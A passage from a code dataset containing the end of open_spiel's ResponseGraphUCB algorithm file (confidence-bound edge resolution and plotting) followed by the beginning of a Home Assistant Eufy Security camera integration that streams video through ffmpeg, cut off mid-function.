UCB delta parameter.\n ucb_eps: float specifying the UCB epsilon parameter.\n per_payoff_confidence: bool specifying whether confidence level applies\n on a per-payoff basis, or to all payoffs simultaneously.\n time_dependent_delta: bool specifying whether the confidence parameter\n varies with the number of interactions so that a union bound holds.\n \"\"\"\n self.exploration_strategy = exploration_strategy\n self.confidence_method = confidence_method\n self.ucb_eps = ucb_eps\n self.G = game # pylint: disable=invalid-name\n self.per_payoff_confidence = per_payoff_confidence\n self.time_dependent_delta = time_dependent_delta\n if self.per_payoff_confidence:\n self._delta = delta\n else:\n self._delta = delta / (\n self.G.n_players *\n functools.reduce(operator.mul, self.G.strategy_spaces, 1))\n\n # Compute the graph\n self.V = list( # pylint: disable=invalid-name\n itertools.product(*[range(smax) for smax in self.G.strategy_spaces]))\n self.E = [] # pylint: disable=invalid-name\n for v in self.V:\n adj_strats = [\n list(range(v[k] + 1, self.G.strategy_spaces[k]))\n for k in range(self.G.n_players)\n ]\n for k in range(self.G.n_players):\n for new_s in adj_strats[k]:\n second_vertex = list(v)\n second_vertex[k] = new_s\n second_vertex = tuple(second_vertex)\n self.E.append((v, second_vertex))\n self.count_history = {v: [] for v in self.V}\n self.total_interactions = 0\n\n def delta(self, k, s):\n \"\"\"Returns the confidence parameter for a given player and profile.\"\"\"\n if not self.time_dependent_delta:\n return self._delta\n else:\n return self._delta * (6 / (np.pi**2 * self.count[k][s] **2))\n\n def initialise_mean_and_count(self):\n \"\"\"Initializes means and counts for all response graph profiles.\"\"\"\n self.mu = [\n np.zeros(tuple(self.G.strategy_spaces)) for _ in range(self.G.n_players)\n ]\n self.count = [\n np.zeros(tuple(self.G.strategy_spaces)) for _ in range(self.G.n_players)\n ]\n\n def update_mean_and_count(self, strat_profile, game_outcome):\n \"\"\"Updates means and counts for strat_profile given game_outcome.\"\"\"\n self.total_interactions += 1\n for k in range(self.G.n_players):\n self.mu[k][strat_profile] *= self.count[k][strat_profile]\n self.mu[k][strat_profile] += game_outcome[k]\n self.count[k][strat_profile] += 1\n self.mu[k][strat_profile] /= self.count[k][strat_profile]\n\n for s in self.V:\n self.count_history[s].append(self.count[0][s] /\n float(self.total_interactions))\n\n def _find_focal_coord(self, s1, s2):\n num_deviations = tuple(s1[l] != s2[l] for l in range(len(s1)))\n assert np.sum(num_deviations) == 1, ('Invalid profile pair s1, s2: ({},{}).'\n 'Exactly one player should'\n 'deviate!'.format(s1, s2))\n return np.argmax(num_deviations)\n\n def _initialise_queue_uniform(self):\n self.remaining_edges = copy.deepcopy(self.E)\n\n def _add_to_queue_uniform(self, edges_removed):\n \"\"\"Adds edge to sampling queue using uniform sampling.\"\"\"\n for e in edges_removed:\n self.remaining_edges.remove(e)\n self.profile_queue.append(\n random.choice(random.choice(self.remaining_edges)))\n\n def _initialise_queue_uniform_exhaustive(self):\n self.edge_order = copy.deepcopy(self.E)\n random.shuffle(self.edge_order)\n\n def _add_to_queue_uniform_exhaustive(self, edges_removed):\n \"\"\"Adds edge to sampling queue using uniform-exhausitive sampling.\"\"\"\n for e in edges_removed:\n self.edge_order.remove(e)\n self.profile_queue.append(random.choice(self.edge_order[0]))\n\n def _initialise_queue_valence_weighted(self):\n self.vertex_valences = {\n v: np.sum(self.G.strategy_spaces) - self.G.n_players for v in self.V\n }\n self.sum_valences = sum(self.vertex_valences.values())\n\n def _add_to_queue_valence_weighted(self, edges_removed):\n \"\"\"Adds edge to sampling queue using valence-weighted sampling.\"\"\"\n # Deal with removed edges\n for e in edges_removed:\n for s in e:\n self.vertex_valences[s] -= 1\n self.sum_valences -= 1\n\n # Calculate probabilities\n probs = np.array([self.vertex_valences[v]**2 for v in self.V])\n probs = probs / np.sum(probs)\n s_ix = np.random.choice(np.arange(len(self.V)), p=probs)\n self.profile_queue.append(self.V[s_ix])\n\n def _initialise_queue_count_weighted(self):\n # Keep track of which vertices have non-zero valence in graph\n self.vertex_valences = {\n v: np.sum(self.G.strategy_spaces) - self.G.n_players for v in self.V\n }\n self.sum_valences = sum(self.vertex_valences.values())\n\n def _add_to_queue_count_weighted(self, edges_removed):\n \"\"\"Adds edge to sampling queue using count-weighted sampling.\"\"\"\n # Update vertex valences\n for e in edges_removed:\n for s in e:\n self.vertex_valences[s] -= 1\n self.sum_valences -= 1\n # Check counts\n eligible_vertices = {\n v: self.count[0][v] for v in self.V if self.vertex_valences[v] != 0\n }\n strat = min(eligible_vertices, key=eligible_vertices.get)\n self.profile_queue.append(strat)\n\n def initialise_queue(self):\n \"\"\"Initializes sampling queue.\"\"\"\n self.edges_remaining = copy.deepcopy(self.E)\n if self.exploration_strategy == 'uniform':\n self._initialise_queue_uniform()\n elif self.exploration_strategy == 'uniform-exhaustive':\n self._initialise_queue_uniform_exhaustive()\n elif self.exploration_strategy == 'valence-weighted':\n self._initialise_queue_valence_weighted()\n elif self.exploration_strategy == 'count-weighted':\n self._initialise_queue_count_weighted()\n else:\n raise ValueError('Did not recognise exploration strategy: {}'.format(\n self.exploration_strategy))\n\n self.profile_queue = []\n\n def add_to_queue(self, removed):\n \"\"\"Update the sampling queue and the list of resolved edges.\n\n Args:\n removed: the list of edges resolved in the previous round, which should be\n removed from the sampling list in subsequent rounds.\n \"\"\"\n if self.exploration_strategy == 'uniform':\n self._add_to_queue_uniform(removed)\n elif self.exploration_strategy == 'uniform-exhaustive':\n self._add_to_queue_uniform_exhaustive(removed)\n elif self.exploration_strategy == 'valence-weighted':\n self._add_to_queue_valence_weighted(removed)\n elif self.exploration_strategy == 'count-weighted':\n self._add_to_queue_count_weighted(removed)\n else:\n raise ValueError('Did not recognise exploration strategy: {}'.format(\n self.exploration_strategy))\n\n def evaluate_strategy_profile(self, yield_outcomes=False):\n \"\"\"Evaluates a strategy profile on the sampling queue.\n\n Specifically, this:\n 1. Removes a strategy profile from the queue.\n 2. Evaluates it.\n 3. Updates internal statistics.\n 4. Adjusts list of strategy profiles whose statistics have been updated\n since last confidence bound check.\n\n Args:\n yield_outcomes: set True to yield the outcomes as well.\n\n Yields:\n s: profile evaluated.\n game_outcome: outcomes (player payoffs) for profile s.\n \"\"\"\n if self.profile_queue:\n s = self.profile_queue.pop(0)\n if s not in self.active_strategy_profiles:\n self.active_strategy_profiles.append(s)\n game_outcome = self.G.observe_result(s)\n if yield_outcomes:\n yield s, game_outcome\n self.update_mean_and_count(s, game_outcome)\n\n def _ucb_standard_factor(self, s, k):\n return np.sqrt(np.log(2 / self.delta(k, s)) / (2 * self.count[k][s]))\n\n def _bernoulli_upper(self, p, n, delta):\n \"\"\"Returns upper confidence bound for proportion p successes of n trials.\n\n Uses exact Clopper-Pearson interval.\n\n Args:\n p: proportion of successes.\n n: number of trials.\n delta: confidence parameter.\n \"\"\"\n if p > 1 - 1e-6:\n return 1.\n else:\n upper = scipy.stats.beta.ppf(1. - delta / 2, p * n + 1, n - p * n)\n return upper\n\n def _bernoulli_lower(self, p, n, delta):\n \"\"\"Returns lower confidence bound for proportion p successes of n trials.\n\n Uses exact Clopper-Pearson interval.\n\n Args:\n p: proportion of successes.\n n: number of trials.\n delta: confidence parameter.\n \"\"\"\n if p < 1e-6:\n return 0.\n else:\n lower = scipy.stats.beta.ppf(delta / 2, p * n, n - p * n + 1)\n return lower\n\n def _ucb(self, s, k):\n \"\"\"Returns k-th player's payoff upper-confidence-bound given profile s.\"\"\"\n if self.confidence_method == 'ucb-standard':\n ucb_factor = self._ucb_standard_factor(s, k)\n return self.mu[k][s] + ucb_factor\n elif self.confidence_method == 'ucb-standard-relaxed':\n ucb_factor = self._ucb_standard_factor(s, k) - self.ucb_eps\n return self.mu[k][s] + ucb_factor\n elif self.confidence_method == 'clopper-pearson-ucb':\n return self._bernoulli_upper(self.mu[k][s], self.count[k][s],\n self.delta(k, s))\n elif self.confidence_method == 'clopper-pearson-ucb-relaxed':\n return self._bernoulli_upper(self.mu[k][s], self.count[k][s],\n self.delta(k, s)) - self.ucb_eps\n else:\n raise ValueError('Did not recognise confidence method {}'.format(\n self.confidence_method))\n\n def _lcb(self, s, k):\n \"\"\"Returns k-th player's payoff lower-confidence-bound given profile s.\"\"\"\n if self.confidence_method == 'ucb-standard':\n ucb_factor = self._ucb_standard_factor(s, k)\n return self.mu[k][s] - ucb_factor\n elif self.confidence_method == 'ucb-standard-relaxed':\n ucb_factor = self._ucb_standard_factor(s, k) + self.ucb_eps\n return self.mu[k][s] - ucb_factor\n elif self.confidence_method == 'clopper-pearson-ucb':\n return self._bernoulli_lower(self.mu[k][s], self.count[k][s],\n self.delta(k, s))\n elif self.confidence_method == 'clopper-pearson-ucb-relaxed':\n return self._bernoulli_lower(self.mu[k][s], self.count[k][s],\n self.delta(k, s)) + self.ucb_eps\n else:\n raise ValueError('Did not recognise confidence method {}'.format(\n self.confidence_method))\n\n def ucb_check(self, e):\n \"\"\"Conducts a UCB check on response graph edge e.\n\n Specifically, given edge e connecting two strategy profiles s1 and s2, this:\n 1. Determines the dominating strategy.\n 2. Checks whether the payoff_UCB(worse_strategy) is less than\n the payoff_LCB of the better strategy; if this is true, the confidence\n intervals are disjoint, and the edge e is considered 'resolved'.\n\n Args:\n e: response graph edge.\n\n Returns:\n A bool indicating whether the edge is resolved,\n and also a tuple specifying the worse and better strategies.\n \"\"\"\n\n s1, s2 = e\n k = self._find_focal_coord(s1, s2)\n if self.mu[k][s1] > self.mu[k][s2]:\n better_strat = s1\n worse_strat = s2\n else:\n better_strat = s2\n worse_strat = s1\n\n ucb = self._ucb(worse_strat, k)\n lcb = self._lcb(better_strat, k)\n\n return (ucb < lcb), (worse_strat, better_strat)\n\n def check_confidence(self):\n \"\"\"Returns the edges that are 'resolved' given a confidence bound check.\"\"\"\n edges_to_check = []\n\n for e in self.edges_remaining:\n for s in self.active_strategy_profiles:\n if s in e:\n if e not in edges_to_check:\n edges_to_check.append(e)\n\n edges_removed = []\n for e in edges_to_check:\n removed, ordered_edge = self.ucb_check(e)\n if removed:\n edges_removed.append(e)\n self.edges_remaining.remove(e)\n self.directed_edges.append(ordered_edge)\n\n self.active_strategy_profiles = []\n\n return edges_removed\n\n def real_edge_direction(self, e):\n s1, s2 = e\n k = self._find_focal_coord(s1, s2)\n if self.G.means[k][s1] > self.G.means[k][s2]:\n return (s2, s1)\n else:\n return (s1, s2)\n\n def construct_real_graph(self):\n directed_edges = []\n for e in self.E:\n ordered_edge = self.real_edge_direction(e)\n directed_edges.append(ordered_edge)\n\n return self._construct_digraph(directed_edges)\n\n def compute_graph(self):\n for e in self.E:\n s1, s2 = e[0], e[1]\n k = self._find_focal_coord(s1, s2)\n if self.mu[k][s1] > self.mu[k][s2]:\n directed_edge = (s2, s1)\n else:\n directed_edge = (s1, s2)\n if directed_edge not in self.directed_edges:\n self.directed_edges.append(directed_edge)\n\n def forced_exploration(self):\n for v in self.V:\n game_outcome = self.G.observe_result(v)\n self.update_mean_and_count(v, game_outcome)\n\n def run(self, verbose=True, max_total_iterations=50000):\n \"\"\"Runs the ResponseGraphUCB algorithm.\"\"\"\n self.verbose = verbose\n\n # Upper bounds on number of evaluations\n self.max_total_iterations = max_total_iterations\n\n self.initialise_mean_and_count()\n self.directed_edges = []\n self.active_strategy_profiles = []\n self.initialise_queue()\n\n # Forced initial exploration\n self.forced_exploration()\n\n # Keep evaluating nodes until check method declares that we're finished\n iterations = 0\n edges_resolved_this_round = []\n while self.total_interactions < max_total_iterations:\n # Add nodes to queue\n self.add_to_queue(removed=edges_resolved_this_round)\n\n # Evaluate the nodes and log results\n for v, _ in self.evaluate_strategy_profile():\n if verbose:\n print(v)\n\n # Recompute confidence bounds, eliminate, stop etc.\n edges_resolved_this_round = self.check_confidence()\n\n if not self.edges_remaining:\n break\n iterations += 1\n\n # Fill in missing edges if max iters reached without resolving all edges\n self.compute_graph()\n\n # Compute objects to be returned\n if verbose:\n total_steps = self.compute_total_steps()\n print('\\nTotal steps taken = {}'.format(total_steps))\n results = {}\n results['interactions'] = int(np.sum(self.count[0]))\n graph = self._construct_digraph(self.directed_edges)\n results['graph'] = graph\n return results\n\n def compute_total_steps(self):\n return int(np.sum(self.count[0]))\n\n def _construct_digraph(self, edges):\n graph = nx.DiGraph()\n graph.add_nodes_from(self.V)\n for e in edges:\n graph.add_edge(e[0], e[1])\n return graph\n\n def _plot_errorbars_2x2x2(self, x, y, xerr, yerr, fmt):\n \"\"\"Plots ResponseGraph with error bars for a 2-player 2x2 game.\"\"\"\n\n # plt.errorbar does not accept list of colors, so plot twice\n for i_strat in [0, 1]:\n if xerr[i_strat] is None:\n plt.errorbar(\n x=x[i_strat],\n y=y[i_strat],\n yerr=np.reshape(yerr[:, i_strat], (2, 1)),\n markerfacecolor='b',\n ecolor='b',\n fmt=fmt,\n zorder=0)\n elif yerr[i_strat] is None:\n plt.errorbar(\n x=x[i_strat],\n y=y[i_strat],\n xerr=np.reshape(xerr[:, i_strat], (2, 1)),\n markerfacecolor='b',\n ecolor='b',\n fmt=fmt,\n zorder=0)\n else:\n raise ValueError()\n\n def visualise_2x2x2(self, real_values, graph):\n \"\"\"Plots summary of ResponseGraphUCB for a 2-player 2x2 game.\"\"\"\n _, axes = plt.subplots(3, 3, figsize=(10, 10),\n gridspec_kw={'width_ratios': [1, 2, 1],\n 'height_ratios': [1, 2, 1]})\n axes[0, 0].axis('off')\n axes[0, 2].axis('off')\n axes[2, 0].axis('off')\n axes[2, 2].axis('off')\n\n # (0,0) vs. (0,1)\n plt.sca(axes[0, 1])\n s1 = (0, 0)\n s2 = (0, 1)\n self._plot_errorbars_2x2x2(\n x=[0, 1],\n y=[self.mu[1][s1], self.mu[1][s2]],\n xerr=[None, None],\n yerr=np.array([[self.mu[1][s1] - self._lcb(s1, 1),\n self.mu[1][s2] - self._lcb(s2, 1)],\n [self._ucb(s1, 1) - self.mu[1][s1],\n self._ucb(s2, 1) - self.mu[1][s2]]]),\n fmt='o')\n plt.scatter([0, 1], [real_values[1, 0, 0], real_values[1, 0, 1]],\n color='red',\n zorder=1)\n plt.tick_params(axis='both', which='major', labelsize=14)\n plt.tick_params(axis='both', which='minor', labelsize=14)\n plt.xticks([])\n plt.yticks([0, 0.5, 1])\n plt.gca().set_yticklabels(['0', '', '1'])\n plt.gca().yaxis.set_ticks_position('left')\n plt.gca().grid(True)\n plt.ylim(0, 1)\n\n # (0,0) vs. (1,0)\n plt.sca(axes[1, 0])\n s1 = (1, 0)\n s2 = (0, 0)\n self._plot_errorbars_2x2x2(\n x=[self.mu[0][s1], self.mu[0][s2]],\n y=[0, 1],\n xerr=np.array([[self.mu[0][s1] - self._lcb(s1, 0),\n self.mu[0][s2] - self._lcb(s2, 0)],\n [self._ucb(s1, 0) - self.mu[0][s1],\n self._ucb(s2, 0) - self.mu[0][s2]]]),\n yerr=[None, None],\n fmt='o')\n plt.scatter([real_values[0, 1, 0], real_values[0, 0, 0]], [0, 1],\n color='red',\n zorder=1)\n plt.tick_params(axis='both', which='major', labelsize=14)\n plt.tick_params(axis='both', which='minor', labelsize=14)\n plt.xticks([0, 0.5, 1])\n plt.gca().set_xticklabels(['0', '', '1'])\n plt.gca().xaxis.set_ticks_position('bottom')\n plt.gca().grid(True)\n plt.yticks([])\n plt.xlim(0, 1)\n\n # (0,1) vs. (1,1)\n plt.sca(axes[1, 2])\n s1 = (1, 1)\n s2 = (0, 1)\n self._plot_errorbars_2x2x2(\n x=[self.mu[0][s1], self.mu[0][s2]],\n y=[0, 1],\n xerr=np.array([[self.mu[0][s1] - self._lcb(s1, 0),\n self.mu[0][s2] - self._lcb(s2, 0)],\n [self._ucb(s1, 0) - self.mu[0][s1],\n self._ucb(s2, 0) - self.mu[0][s2]]]),\n yerr=[None, None],\n fmt='o')\n plt.scatter([real_values[0, 1, 1], real_values[0, 0, 1]], [0, 1],\n color='red',\n zorder=1)\n plt.tick_params(axis='both', which='major', labelsize=14)\n plt.tick_params(axis='both', which='minor', labelsize=14)\n plt.xticks([0, 0.5, 1])\n plt.gca().set_xticklabels(['0', '', '1'])\n plt.gca().xaxis.set_ticks_position('top')\n plt.yticks([])\n plt.gca().grid(True)\n plt.xlim(0, 1)\n\n # (1,0) vs. (1,1)\n plt.sca(axes[2, 1])\n s1 = (1, 0)\n s2 = (1, 1)\n self._plot_errorbars_2x2x2(\n x=[0, 1],\n y=[self.mu[1][s1], self.mu[1][s2]],\n xerr=[None, None],\n yerr=np.array([[self.mu[1][s1] - self._lcb(s1, 1),\n self.mu[1][s2] - self._lcb(s2, 1)],\n [self._ucb(s1, 1) - self.mu[1][s1],\n self._ucb(s2, 1) - self.mu[1][s2]]]),\n fmt='o')\n plt.scatter([0, 1], [real_values[1, 1, 0], real_values[1, 1, 1]],\n color='red',\n zorder=1)\n plt.tick_params(axis='both', which='major', labelsize=14)\n plt.tick_params(axis='both', which='minor', labelsize=14)\n plt.xticks([])\n plt.yticks([0, 0.5, 1])\n plt.gca().set_yticklabels(['0', '', '1'])\n plt.gca().yaxis.set_ticks_position('right')\n plt.gca().grid(True)\n plt.ylim(0, 1)\n self.plot_graph(graph, subplot=True, axes=axes) # Chart in the middle\n\n def plot_graph(self, graph, subplot=False, axes=None):\n \"\"\"Plots the response graph.\"\"\"\n if subplot:\n plt.sca(axes[1, 1])\n axes[1, 1].axis('off')\n else:\n plt.figure(figsize=(5, 5))\n if len(graph.nodes) == 4:\n pos = {(0, 0): [0, 1], (0, 1): [1, 1], (1, 0): [0, 0], (1, 1): [1, 0]}\n else:\n pos = nx.circular_layout(graph)\n nx.draw_networkx_nodes(\n graph, pos, node_size=1800, node_color='w', edgecolors='k')\n nx.draw_networkx_edges(\n graph,\n pos,\n node_size=1800,\n edge_color='k',\n arrowstyle='->',\n arrowsize=10,\n width=3)\n nx.draw_networkx_labels(self.G, pos, {x: x for x in self.V}, font_size=14)\n\n def visualise_count_history(self, figsize=(5, 2)):\n \"\"\"Plots the sampling count history for each strategy profile.\"\"\"\n plt.figure(figsize=figsize)\n data = []\n labels = []\n for v in self.V:\n print(v)\n labels.append(v)\n data.append(self.count_history[v])\n pal = plt.get_cmap('Dark2').colors\n plt.stackplot(\n np.arange(1, self.total_interactions + 1),\n np.array(data),\n labels=labels,\n colors=pal)\n plt.ylim(top=1, bottom=0)\n plt.xlabel('Interactions')\n plt.ylabel('Proportions')\n\n # Shrink current axis\n ax = plt.gca()\n ax.xaxis.set_ticks_position('bottom')\n ax.yaxis.set_ticks_position('left')\n box = ax.get_position()\n ax.set_position([box.x0, box.y0, box.width * 0.67, box.height])\n plt.xlim(1, self.total_interactions)\n plt.legend(loc='center left', bbox_to_anchor=(1, 0.5), ncol=1)\n","repo_name":"deepmind/open_spiel","sub_path":"open_spiel/python/algorithms/response_graph_ucb.py","file_name":"response_graph_ucb.py","file_ext":"py","file_size_in_byte":21882,"program_lang":"python","lang":"en","doc_type":"code","stars":3700,"dataset":"github-code","pt":"37"} +{"seq_id":"24275451277","text":"from aiohttp import web\nimport aiohttp\nimport asyncio\nimport logging\nfrom contextlib import suppress\nimport threading\nfrom time import sleep\nimport socket\nimport traceback\n\nfrom haffmpeg.camera import CameraMjpeg\nfrom haffmpeg.tools import ImageFrame\nimport voluptuous as vol\nimport async_timeout\n\nfrom homeassistant.components.camera import (\n SUPPORT_ON_OFF,\n SUPPORT_STREAM,\n Camera,\n CameraEntityFeature,\n)\nfrom homeassistant.components.camera.const import STREAM_TYPE_HLS\nfrom homeassistant.components.ffmpeg import DATA_FFMPEG\nfrom homeassistant.config_entries import ConfigEntry\nfrom homeassistant.core import HomeAssistant\nfrom homeassistant.exceptions import HomeAssistantError\nfrom homeassistant.helpers import entity_platform\nfrom homeassistant.helpers.aiohttp_client import (\n async_aiohttp_proxy_stream,\n async_get_clientsession,\n)\nimport homeassistant.helpers.config_validation as cv\nfrom homeassistant.helpers.config_validation import make_entity_service_schema\nfrom homeassistant.helpers.event import async_call_later\n\nfrom .const import COORDINATOR, DEFAULT_CODEC, DOMAIN, NAME, Device, wait_for_value\nfrom .coordinator import EufySecurityDataUpdateCoordinator\nfrom .entity import EufySecurityEntity\n\nSTATE_IDLE = \"Idle\"\nSTATE_STREAMING = \"Streaming\"\nSTATE_MOTION_DETECTED = \"Motion Detected\"\nSTATE_PERSON_DETECTED = \"Person Detected\"\n\nSTREAMING_SOURCE_RTSP = \"rtsp\"\nSTREAMING_SOURCE_P2P = \"p2p\"\n\nFFMPEG_COMMAND = [\n # \"-re\",\n \"-y\",\n \"-analyzeduration\",\n \"{analyze_duration}\",\n \"-protocol_whitelist\",\n \"pipe,file,tcp\",\n \"-f\",\n \"{video_codec}\",\n \"-i\",\n # \"-\",\n \"tcp://localhost:{port}\",\n \"-vcodec\",\n \"copy\",\n \"-protocol_whitelist\",\n \"pipe,file,tcp,udp,rtsp,rtp\",\n]\nFFMPEG_OPTIONS = (\n \" -hls_init_time 0\"\n \" -hls_time 1\"\n \" -hls_segment_type mpegts\"\n \" -hls_playlist_type event \"\n \" -hls_list_size 0\"\n \" -preset ultrafast\"\n \" -tune zerolatency\"\n \" -g 15\"\n \" -sc_threshold 0\"\n \" -fflags genpts+nobuffer+flush_packets\"\n \" -loglevel debug\"\n)\n\n_LOGGER: logging.Logger = logging.getLogger(__package__)\n\nALARM_TRIGGER_SCHEMA = make_entity_service_schema({vol.Required(\"duration\"): cv.Number})\n\nQUICK_RESPONSE_SCHEMA = make_entity_service_schema(\n {vol.Required(\"voice_id\"): cv.Number}\n)\n\n\nasync def async_setup_entry(\n hass: HomeAssistant, config_entry: ConfigEntry, async_add_devices\n):\n coordinator: EufySecurityDataUpdateCoordinator = hass.data[DOMAIN][COORDINATOR]\n\n entities = []\n for device in coordinator.devices.values():\n if device.is_camera() is True:\n camera: EufySecurityCamera = EufySecurityCamera(\n coordinator, config_entry, device\n )\n entities.append(camera)\n\n _LOGGER.debug(f\"{DOMAIN} - camera setup entries - {entities}\")\n async_add_devices(entities, True)\n\n # register entity level services\n platform = entity_platform.async_get_current_platform()\n platform.async_register_entity_service(\n \"start_livestream\", {}, \"async_start_p2p_livestream\"\n )\n platform.async_register_entity_service(\n \"stop_livestream\", {}, \"async_stop_p2p_livestream\"\n )\n platform.async_register_entity_service(\n \"start_p2p_livestream\", {}, \"async_start_p2p_livestream\"\n )\n platform.async_register_entity_service(\n \"stop_p2p_livestream\", {}, \"async_stop_p2p_livestream\"\n )\n platform.async_register_entity_service(\n \"start_rtsp_livestream\", {}, \"async_start_rtsp_livestream\"\n )\n platform.async_register_entity_service(\n \"stop_rtsp_livestream\", {}, \"async_stop_rtsp_livestream\"\n )\n platform.async_register_entity_service(\"enable_rtsp\", {}, \"async_enable_rtsp\")\n platform.async_register_entity_service(\"disable_rtsp\", {}, \"async_disable_rtsp\")\n platform.async_register_entity_service(\"enable\", {}, \"async_enable\")\n platform.async_register_entity_service(\"disable\", {}, \"async_disable\")\n platform.async_register_entity_service(\n \"alarm_trigger_for_camera_with_duration\",\n ALARM_TRIGGER_SCHEMA,\n \"async_alarm_trigger_with_duration\",\n )\n platform.async_register_entity_service(\n \"reset_alarm_for_camera\", {}, \"async_reset_alarm\"\n )\n platform.async_register_entity_service(\n \"quick_response\", QUICK_RESPONSE_SCHEMA, \"async_quick_response\"\n )\n\n\nclass EufySecurityCamera(Camera, EufySecurityEntity):\n def __init__(\n self,\n coordinator: EufySecurityDataUpdateCoordinator,\n config_entry: ConfigEntry,\n device: Device,\n ) -> None:\n Camera.__init__(self)\n EufySecurityEntity.__init__(self, coordinator, config_entry, device)\n\n self.device.set_streaming_status_callback(self.set_is_streaming)\n self._attr_frontend_stream_type = STREAM_TYPE_HLS\n self._attr_supported_features = CameraEntityFeature.STREAM\n self._attr_name = self.device.name\n self._attr_id = f\"{DOMAIN}_{self.device.serial_number}_camera\"\n self._attr_unique_id = self._attr_id\n self._attr_brand = NAME\n self._attr_model = self.device.model\n\n # camera image\n self.picture_bytes = None\n self.picture_url = None\n self.no_picture_counter = 0\n\n # p2p streaming\n self.start_stream_function = self.async_start_p2p_livestream\n self.stop_stream_function = self.async_stop_p2p_livestream\n\n # video generation using ffmpeg for p2p\n self.ffmpeg_binary = self.coordinator.hass.data[DATA_FFMPEG].binary\n self.ffmpeg_content_type = self.coordinator.hass.data[\n DATA_FFMPEG\n ].ffmpeg_stream_content_type\n self.ffmpeg = CameraMjpeg(self.ffmpeg_binary)\n self.default_codec = DEFAULT_CODEC\n self.is_ffmpeg_running = False\n\n # when HA started, p2p streaming was active, catch up with p2p streaming\n if self.device.is_p2p_streaming is True:\n async_call_later(self.coordinator.hass, 0, self.async_start_p2p_livestream)\n\n self.p2p_url = f\"rtsp://{self.coordinator.config.rtsp_server_address}:{self.coordinator.config.rtsp_server_port}/{self.device.serial_number}\"\n self.p2p_port = 0\n self.p2p_thread = threading.Thread(\n target=self.handle_queue_threaded, daemon=True\n )\n self.p2p_thread.start()\n self.ffmpeg_output = f\"-f rtsp -rtsp_transport tcp {self.p2p_url}\"\n\n # for rtsp streaming\n if self.device.state.get(\"rtspStream\", None) is not None:\n self.start_stream_function = self.async_start_rtsp_livestream\n self.stop_stream_function = self.async_stop_rtsp_livestream\n\n self.set_is_streaming()\n\n def handle_queue_threaded(self):\n codec_checked = False\n with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as sock:\n try:\n _LOGGER.debug(\"start socket for tcp\")\n sock.bind((\"localhost\", 0))\n self.p2p_port = sock.getsockname()[1]\n except Exception as err:\n _LOGGER.error(\"Unable to connect to host: %s\", err)\n return\n\n while True:\n sock.listen()\n client_socket, client_address = sock.accept()\n _LOGGER.debug(\"client connected\")\n\n with client_socket:\n while self.device.is_streaming is True:\n while not self.device.queue.empty():\n if (\n codec_checked is False\n and self.device.codec != self.default_codec\n ):\n self.default_codec = self.device.codec\n self.stop_ffmpeg()\n async_call_later(\n self.coordinator.hass, 0, self.start_ffmpeg\n )\n codec_checked = True\n _LOGGER.debug(\n f\"{DOMAIN} {self.name} - handle_queue_threaded - fix codec\"\n )\n sleep(2)\n break\n\n try:\n client_socket.sendall(\n bytearray(self.device.queue.get()[\"data\"])\n )\n except OSError as err:\n _LOGGER.error(\"Unable to send payload : %s\", err)\n\n sleep(0.1)\n client_socket.close()\n sock.close()\n _LOGGER.debug(\n f\"{DOMAIN} {self.name} - handle_queue_threaded - finish - {self.device.queue.qsize()} - {self.ffmpeg.is_running} - {self.device.is_streaming}\"\n )\n\n async def start_ffmpeg(self, executed_at=None):\n _LOGGER.debug(\n f\"{DOMAIN} {self.name} - start_ffmpeg 1 - codec {self.default_codec}\"\n )\n ffmpeg_command_instance = FFMPEG_COMMAND.copy()\n input_index = ffmpeg_command_instance.index(\"-i\")\n ffmpeg_command_instance[input_index - 1] = self.default_codec\n ffmpeg_command_instance[input_index - 5] = str(\n int(self.coordinator.config.ffmpeg_analyze_duration) * 1000000\n )\n ffmpeg_command_instance[input_index + 1] = ffmpeg_command_instance[\n input_index + 1\n ].replace(\"{port}\", str(self.p2p_port))\n _LOGGER.debug(\n f\"{DOMAIN} {self.name} - start_ffmpeg 2 - ffmpeg_command_instance {ffmpeg_command_instance}\"\n )\n\n ffmpeg_options_instance = FFMPEG_OPTIONS\n if self.coordinator.config.generate_ffmpeg_logs == True:\n ffmpeg_options_instance = ffmpeg_options_instance + \" -report\"\n\n result = await self.ffmpeg.open(\n cmd=ffmpeg_command_instance,\n input_source=None,\n extra_cmd=ffmpeg_options_instance,\n output=self.ffmpeg_output,\n stderr_pipe=False,\n stdout_pipe=False,\n )\n _LOGGER.debug(\n f\"{DOMAIN} {self.name} - start_ffmpeg 3 - ffmpeg_command_instance {ffmpeg_command_instance}\"\n )\n self.is_ffmpeg_running = True\n return result\n\n def stop_ffmpeg(self):\n try:\n self.ffmpeg.kill()\n except Exception as ex:\n _LOGGER.error(\n f\"{DOMAIN} {self.name} - stop_ffmpeg exception: {ex} - traceback: {traceback.format_exc()}\"\n )\n self.is_ffmpeg_running = False\n _LOGGER.debug(f\"{DOMAIN} {self.name} - stop_ffmpeg - done\")\n\n def start_p2p(self):\n _LOGGER.debug(f\"{DOMAIN} {self.name} - start_p2p - 1\")\n self.device.queue.queue.clear()\n self.empty_queue_counter = 0\n if self.ffmpeg.is_running is True:\n _LOGGER.debug(\n f\"{DOMAIN} {self.name} - start_p2p - ffmeg - running - stop it\"\n )\n self.stop_ffmpeg()\n _LOGGER.debug(f\"{DOMAIN} {self.name} - start_p2p - 2\")\n _LOGGER.debug(f\"{DOMAIN} {self.name} - start_p2p - 3\")\n async_call_later(self.coordinator.hass, 1, self.start_ffmpeg)\n\n def stop_p2p(self):\n self.device.queue.queue.clear()\n if self.stream is not None:\n self.stream.stop()\n self.stream = None\n if self.ffmpeg.is_running is True:\n self.stop_ffmpeg()\n self.empty_queue_counter = 0\n\n @property\n def state(self) -> str:\n if self.device.is_streaming is True:\n return f\"{STATE_STREAMING}\"\n elif self.device.state.get(\"motionDetected\", False):\n return STATE_MOTION_DETECTED\n elif self.device.state.get(\"personDetected\", False):\n return STATE_PERSON_DETECTED\n else:\n if not self.device.state.get(\"battery\", None) is None:\n return f\"{STATE_IDLE} - {self.device.state['battery']} %\"\n return STATE_IDLE\n\n def set_is_streaming(self):\n _LOGGER.debug(\n f\"{DOMAIN} {self.name} - set_is_streaming - start - {self.device.is_rtsp_streaming} - {self.device.is_p2p_streaming} - {self.device.is_streaming}\"\n )\n # based on streaming options, set streaming variables\n if (\n self.device.is_rtsp_streaming is True\n or self.device.is_p2p_streaming is True\n ) and self.device.is_streaming is False:\n _LOGGER.debug(f\"{DOMAIN} {self.name} - set_is_streaming - some streaming\")\n if self.device.is_rtsp_streaming is True:\n self.device.stream_source_type = STREAMING_SOURCE_RTSP\n self.device.stream_source_address = self.device.state[\"rtspStreamUrl\"]\n self.device.is_streaming = 